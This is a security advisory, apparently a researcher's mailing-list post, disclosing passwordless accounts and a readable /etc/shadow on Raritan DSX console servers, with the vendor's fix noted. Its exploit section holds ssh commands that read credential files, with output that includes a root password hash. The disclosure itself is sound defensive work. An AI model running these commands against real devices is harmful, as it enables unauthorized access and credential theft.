Hi, during my research on console servers I've encountered a severe problem on one appliance. Summary: Access right escalation / severe permission problems on Raritan Console Servers Confirmed on DSX32, Software version: 2.4.6 www.raritan.com, more see below Details: DSX Raritan Console Servers come with two accounts not having a password. They are "protected" by "exit" in ~/.profile. Users normally is not supposed to get access to the underlying Linux. DES encrypted root passwd is easily retrievable from the network without providing credentials. Also the machine can be rendered useless by moving the busybox binary. Vulnerable Versions: Vendor Confirmation for DSX16, DSX32, DSX4, DSX8, DSXA-48 (Mips and Intel). Patches/Workarounds: After reporting it to Raritan a fix was released: http://www.raritan.com/support/sup_upgrades.aspx Exploit: %ssh dominion@ ls -l / [..shows listing..] %ssh dominion@ ls -ln /etc/shadow -rw-r--r-- 1 0 0 360 Jun 28 05:09 /etc/shadow %ssh dominion@ cat /etc/shadow root:DX8k7w4C2gJ2g:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: adm:*:10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody:*:10933:0:99999:7::: dominion::12962:0:99999:7::: sshd::12962:0:99999:7::: %ssh dominion@ cat /etc/passwd | tail -2 dominion:x:500:500:Embedix User,,,:/home/dominion:/bin/sh sshd:x:501:501:Embedix User,,,:/home/sshd:/bin/sh %ssh sshd@ ls indexApp.htm %ssh sshd@ ls -l /bin/busybox -rwxrwxrwx 1 root root 193852 Apr 4 2004 /bin/busybox ----- Dr. Dirk Wetter http://drwetter.org Consulting IT-Security + Open Source Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153